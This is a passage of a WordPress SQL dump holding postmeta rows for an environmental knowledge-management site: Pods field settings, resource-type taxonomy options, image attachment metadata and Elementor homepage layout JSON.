i'),(4951,453,'text_max_length','255'),(4952,453,'website_format','normal'),(4953,453,'website_allow_port','0'),(4954,453,'website_clickable','0'),(4955,453,'website_new_window','0'),(4956,453,'website_max_length','255'),(4957,453,'website_html5','0'),(4958,453,'website_placeholder','Project web link'),(4959,453,'phone_format','999-999-9999 x999'),(4960,453,'phone_enable_phone_extension','1'),(4961,453,'phone_max_length','25'),(4962,453,'phone_html5','0'),(4963,453,'email_max_length','255'),(4964,453,'email_html5','0'),(4965,453,'password_max_length','255'),(4966,453,'paragraph_allow_html','1'),(4967,453,'paragraph_oembed','0'),(4968,453,'paragraph_wptexturize','1'),(4969,453,'paragraph_convert_chars','1'),(4970,453,'paragraph_wpautop','1'),(4971,453,'paragraph_allow_shortcode','0'),(4972,453,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(4973,453,'paragraph_max_length','0'),(4974,453,'wysiwyg_editor','tinymce'),(4975,453,'wysiwyg_media_buttons','1'),(4976,453,'wysiwyg_oembed','0'),(4977,453,'wysiwyg_wptexturize','1'),(4978,453,'wysiwyg_convert_chars','1'),(4979,453,'wysiwyg_wpautop','1'),(4980,453,'wysiwyg_allow_shortcode','0'),(4981,453,'code_allow_shortcode','0'),(4982,453,'code_max_length','0'),(4983,453,'datetime_type','format'),(4984,453,'datetime_format','mdy'),(4985,453,'datetime_time_type','12'),(4986,453,'datetime_time_format','h_mma'),(4987,453,'datetime_time_format_24','hh_mm'),(4988,453,'datetime_allow_empty','1'),(4989,453,'datetime_html5','0'),(4990,453,'date_type','format'),(4991,453,'date_format','mdy'),(4992,453,'date_allow_empty','1'),(4993,453,'date_html5','0'),(4994,453,'time_type','12'),(4995,453,'time_format','h_mma'),(4996,453,'time_format_24','hh_mm'),(4997,453,'time_allow_empty','1'),(4998,453,'time_html5','0'),(4999,453,'number_format_type','number'),(5000,453,'number_format','i18n'),(5001,453,'number_decimals','0'),(5002,453,'number_format_soft','0'),(5003,453,'number_step','1'),(5004,453,'number_min','0'),(5005,453,'number_max','100'),(5006,453,'number_max_length','12'),(5007,453,'currency_format_type','number'),(5008,453,'currency_format_sign','usd'),(5009,453,'currency_format_placement','before'),(5010,453,'currency_format','i18n'),(5011,453,'currency_decimals','2'),(5012,453,'currency_decimal_handling','none'),(5013,453,'currency_step','1'),(5014,453,'currency_min','0'),(5015,453,'currency_max','1000'),(5016,453,'currency_max_length','12'),(5017,453,'file_format_type','single'),(5018,453,'file_uploader','attachment'),(5019,453,'file_attachment_tab','upload'),(5020,453,'file_edit_title','1'),(5021,453,'file_show_edit_link','0'),(5022,453,'file_linked','0'),(5023,453,'file_limit','0'),(5024,453,'file_restrict_filesize','10MB'),(5025,453,'file_type','images'),(5026,453,'file_field_template','rows'),(5027,453,'file_add_button','Add File'),(5028,453,'file_modal_title','Attach a file'),(5029,453,'file_modal_add_button','Add File'),(5030,453,'file_wp_gallery_output','0'),(5031,453,'file_wp_gallery_link','post'),(5032,453,'file_wp_gallery_columns','1'),(5033,453,'file_wp_gallery_random_sort','0'),(5034,453,'file_wp_gallery_size','thumbnail'),(5035,453,'oembed_width','0'),(5036,453,'oembed_height','0'),(5037,453,'oembed_show_preview','0'),(5038,453,'oembed_restrict_providers','0'),(5039,453,'oembed_enabled_providers_amazoncn','0'),(5040,453,'oembed_enabled_providers_amazoncouk','0'),(5041,453,'oembed_enabled_providers_amazoncom','0'),(5042,453,'oembed_enabled_providers_amazoncomau','0'),(5043,453,'oembed_enabled_providers_amazonin','0'),(5044,453,'oembed_enabled_providers_animotocom','0'),(5045,453,'oembed_enabled_providers_cloudupcom','0'),(5046,453,'oembed_enabled_providers_collegehumorcom','0'),(5047,453,'oembed_enabled_providers_crowdsignalcom','0'),(5048,453,'oembed_enabled_providers_dailymotioncom','0'),(5049,453,'oembed_enabled_providers_facebookcom','0'),(5050,453,'oembed_enabled_providers_flickrcom','0'),(5051,453,'oembed_enabled_providers_hulucom','0'),(5052,453,'oembed_enabled_providers_imgurcom','0'),(5053,453,'oembed_enabled_providers_instagramcom','0'),(5054,453,'oembed_enabled_providers_issuucom','0'),(5055,453,'oembed_enabled_providers_kickstartercom','0'),(5056,453,'oembed_enabled_providers_meetupcom','0'),(5057,453,'oembed_enabled_providers_mixcloudcom','0'),(5058,453,'oembed_enabled_providers_redditcom','0'),(5059,453,'oembed_enabled_providers_reverbnationcom','0'),(5060,453,'oembed_enabled_providers_screencastcom','0'),(5061,453,'oembed_enabled_providers_scribdcom','0'),(5062,453,'oembed_enabled_providers_slidesharenet','0'),(5063,453,'oembed_enabled_providers_smugmugcom','0'),(5064,453,'oembed_enabled_providers_someecardscom','0'),(5065,453,'oembed_enabled_providers_soundcloudcom','0'),(5066,453,'oembed_enabled_providers_speakerdeckcom','0'),(5067,453,'oembed_enabled_providers_spotifycom','0'),(5068,453,'oembed_enabled_providers_tedcom','0'),(5069,453,'oembed_enabled_providers_tumblrcom','0'),(5070,453,'oembed_enabled_providers_twittercom','0'),(5071,453,'oembed_enabled_providers_vimeocom','0'),(5072,453,'oembed_enabled_providers_wordpresscom','0'),(5073,453,'oembed_enabled_providers_wordpresstv','0'),(5074,453,'oembed_enabled_providers_youtubecom','0'),(5075,453,'pick_format_type','single'),(5076,453,'pick_format_single','dropdown'),(5077,453,'pick_format_multi','checkbox'),(5078,453,'pick_allow_add_new','1'),(5079,453,'pick_taggable','0'),(5080,453,'pick_show_icon','1'),(5081,453,'pick_show_edit_link','1'),(5082,453,'pick_show_view_link','1'),(5083,453,'pick_limit','0'),(5084,453,'pick_user_role','a:0:{}'),(5085,453,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(5086,453,'boolean_format_type','checkbox'),(5087,453,'boolean_yes_label','Yes'),(5088,453,'boolean_no_label','No'),(5089,453,'admin_only','0'),(5090,453,'restrict_role','0'),(5091,453,'restrict_capability','0'),(5092,453,'hidden','0'),(5093,453,'read_only','0'),(5094,453,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(5095,453,'rest_read','0'),(5096,453,'rest_write','0'),(5097,453,'rest_pick_response','array'),(5098,453,'rest_pick_depth','2'),(5255,412,'built_in_post_types_document','1'),(5256,413,'built_in_post_types_document','1'),(5470,412,'built_in_post_types_news_resource','1'),(5471,413,'built_in_post_types_news_resource','1'),(5472,449,'menu_icon','dashicons-pressthis'),(5474,413,'built_in_post_types_project_resource','1'),(5475,450,'unique','0'),(5480,453,'unique','0'),(5481,453,'website_repeatable','0'),(5490,419,'pfat_single','Document Resources Template'),(5494,462,'_edit_last','1'),(5495,462,'_edit_lock','1574214083:1'),(5496,462,'_elementor_controls_usage','a:0:{}'),(5498,462,'admin_only',''),(5499,462,'restrict_capability',''),(5500,462,'capability_allowed',''),(5502,449,'pfat_single','Project Resource Template'),(5505,465,'_elementor_controls_usage','a:0:{}'),(5506,465,'label_singular','Resource Type'),(5507,465,'public','1'),(5508,465,'show_ui','1'),(5509,465,'hierarchical','1'),(5510,465,'type','taxonomy'),(5511,465,'storage','meta'),(5512,465,'old_name','resource_type'),(5513,465,'rewrite','1'),(5514,465,'rewrite_with_front','1'),(5515,465,'rewrite_hierarchical','1'),(5516,465,'capability_type','default'),(5517,465,'capability_type_custom','resource_type'),(5518,465,'query_var','0'),(5519,465,'sort','0'),(5520,465,'built_in_post_types_amn_wpforms-lite','0'),(5521,465,'built_in_post_types_custom_css','0'),(5522,465,'built_in_post_types_customize_changeset','0'),(5523,465,'built_in_post_types_document','1'),(5524,465,'built_in_post_types_elementor-hf','0'),(5525,465,'built_in_post_types_elementor_library','0'),(5526,465,'built_in_post_types_jet-smart-filters','0'),(5527,465,'built_in_post_types_news_resource','1'),(5528,465,'built_in_post_types_ocean_modal_window','0'),(5529,465,'built_in_post_types_ocean_posts_slider','0'),(5530,465,'built_in_post_types_oceanwp_library','0'),(5531,465,'built_in_post_types_oembed_cache','0'),(5532,465,'built_in_post_types_page','0'),(5533,465,'built_in_post_types_post','0'),(5534,465,'built_in_post_types_project_resource','1'),(5535,465,'built_in_post_types_related_topic','1'),(5536,465,'built_in_post_types_user_request','0'),(5537,465,'built_in_post_types_wp_block','0'),(5538,465,'built_in_post_types_wpforms','0'),(5539,465,'built_in_post_types_wpforms_log','0'),(5540,465,'built_in_post_types_attachment','0'),(5541,465,'show_in_menu','1'),(5542,465,'menu_location','default'),(5543,465,'menu_position','0'),(5544,465,'show_in_nav_menus','1'),(5545,465,'show_tagcloud','1'),(5546,465,'show_tagcloud_in_edit','1'),(5547,465,'show_in_quick_edit','1'),(5548,465,'show_admin_column','0'),(5549,465,'pfat_enable','0'),(5550,465,'pfat_run_outside_loop','0'),(5551,465,'pfat_append_archive','append'),(5552,465,'rest_enable','0'),(5553,465,'read_all','0'),(5554,465,'write_all','0'),(5555,419,'built_in_taxonomies_resource_type','1'),(5557,449,'built_in_taxonomies_resource_type','1'),(5558,418,'built_in_taxonomies_resource_type','1'),(5561,467,'_edit_last','42'),(5562,467,'_edit_lock','1604915684:42'),(5563,467,'_elementor_controls_usage','a:0:{}'),(5564,468,'_elementor_controls_usage','a:0:{}'),(5565,468,'_dp_original','467'),(5566,468,'_edit_lock','1573310649:1'),(5567,468,'_edit_last','1'),(5568,469,'_elementor_controls_usage','a:0:{}'),(5570,469,'_dp_original','468'),(5571,469,'_edit_lock','1604930333:42'),(5572,469,'_edit_last','42'),(5573,470,'_elementor_controls_usage','a:0:{}'),(5575,470,'_dp_original','469'),(5576,470,'_edit_lock','1573310781:1'),(5577,470,'_edit_last','1'),(5578,418,'pfat_single','Document Resources Template'),(5580,412,'built_in_post_types_related_theme','1'),(5581,413,'built_in_post_types_related_theme','1'),(5582,465,'built_in_post_types_related_theme','1'),(5583,471,'_elementor_controls_usage','a:0:{}'),(5585,471,'_dp_original','470'),(5586,471,'_edit_lock','1574726507:1'),(5587,471,'_edit_last','1'),(5588,472,'_elementor_controls_usage','a:0:{}'),(5590,472,'_dp_original','471'),(5591,472,'_edit_lock','1605099111:42'),(5592,472,'_edit_last','42'),(5593,473,'_elementor_controls_usage','a:0:{}'),(5595,473,'_dp_original','472'),(5596,473,'_edit_lock','1574714087:1'),(5597,473,'_edit_last','1'),(5598,474,'_elementor_controls_usage','a:0:{}'),(5600,474,'_dp_original','473'),(5601,474,'_edit_lock','1574467503:1'),(5602,474,'_edit_last','1'),(5603,476,'_elementor_controls_usage','a:0:{}'),(5605,476,'_dp_original','474'),(5606,476,'_edit_lock','1604931867:42'),(5607,476,'_edit_last','42'),(5608,477,'_elementor_controls_usage','a:0:{}'),(5610,477,'_dp_original','476'),(5611,477,'_edit_lock','1574713452:1'),(5612,477,'_edit_last','1'),(5613,478,'_elementor_controls_usage','a:0:{}'),(5615,478,'_dp_original','477'),(5616,478,'_edit_lock','1604935664:42'),(5617,478,'_edit_last','42'),(5618,479,'_elementor_controls_usage','a:0:{}'),(5620,479,'_dp_original','476'),(5621,479,'_edit_lock','1605099022:42'),(5622,479,'_edit_last','42'),(5623,480,'_elementor_controls_usage','a:0:{}'),(5625,480,'_dp_original','479'),(5626,480,'_edit_lock','1574728092:1'),(5627,480,'_edit_last','1'),(5628,481,'_elementor_controls_usage','a:0:{}'),(5630,481,'_dp_original','480'),(5631,481,'_edit_lock','1574712405:1'),(5632,481,'_edit_last','1'),(5633,482,'_elementor_controls_usage','a:0:{}'),(5635,482,'_dp_original','481'),(5636,482,'_edit_lock','1574467063:1'),(5637,482,'_edit_last','1'),(5638,483,'_elementor_controls_usage','a:0:{}'),(5640,483,'_dp_original','482'),(5641,483,'_edit_lock','1605098479:42'),(5642,483,'_edit_last','42'),(5643,484,'_elementor_controls_usage','a:0:{}'),(5645,484,'_dp_original','483'),(5646,484,'_edit_lock','1573755677:1'),(5647,484,'_edit_last','1'),(5648,485,'_elementor_controls_usage','a:0:{}'),(5650,485,'_dp_original','484'),(5651,485,'_edit_lock','1604932013:42'),(5652,485,'_edit_last','1'),(5653,486,'_elementor_controls_usage','a:0:{}'),(5655,486,'_dp_original','485'),(5656,486,'_edit_lock','1574713948:1'),(5657,486,'_edit_last','1'),(5658,487,'_elementor_controls_usage','a:0:{}'),(5660,487,'_dp_original','486'),(5661,487,'_edit_lock','1573310909:1'),(5662,487,'_edit_last','1'),(5663,488,'_elementor_controls_usage','a:0:{}'),(5665,488,'_dp_original','487'),(5666,488,'_edit_lock','1589555530:38'),(5667,488,'_edit_last','1'),(5668,473,'_thumbnail_id','2661'),(5669,492,'_wp_attached_file','2019/11/featured_marine_coastal.jpg'),(5670,492,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:567;s:4:\"file\";s:35:\"2019/11/featured_marine_coastal.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"featured_marine_coastal-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"featured_marine_coastal-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"featured_marine_coastal-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"featured_marine_coastal-1024x567.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:567;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"COOLPIX L30\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473649719\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5671,468,'_thumbnail_id','492'),(5672,493,'_wp_attached_file','2019/11/featured_land_climate.jpg'),(5673,493,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:571;s:4:\"file\";s:33:\"2019/11/featured_land_climate.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"featured_land_climate-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"featured_land_climate-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"featured_land_climate-768x428.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:428;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"featured_land_climate-1024x571.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:571;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.7\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX A300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1529393487\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.5\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5674,474,'_thumbnail_id','2158'),(5675,494,'_wp_attached_file','2019/11/featured_inland_waters.jpg'),(5676,494,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:509;s:4:\"file\";s:34:\"2019/11/featured_inland_waters.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"featured_inland_waters-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"featured_inland_waters-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"featured_inland_waters-768x382.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"featured_inland_waters-1024x509.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473268590\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"47\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5677,470,'_thumbnail_id','494'),(5678,495,'_wp_attached_file','2019/11/featured_local_communities.jpg'),(5679,495,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:534;s:4:\"file\";s:38:\"2019/11/featured_local_communities.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"featured_local_communities-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"featured_local_communities-300x156.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"featured_local_communities-768x401.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"featured_local_communities-1024x534.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:534;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1459257087\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5680,487,'_thumbnail_id','495'),(5681,496,'_wp_page_template','default'),(5682,496,'_elementor_edit_mode','builder'),(5683,496,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"layout\":\"\",\"show_terms\":\"\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"}],\"isInner\":false}],\"isInner\":false}]'),(5684,496,'_elementor_version','2.7.5'),(5685,496,'_elementor_template_type','wp-page'),(5688,497,'_wp_page_template','default'),(5689,497,'_elementor_edit_mode','builder'),(5690,497,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\"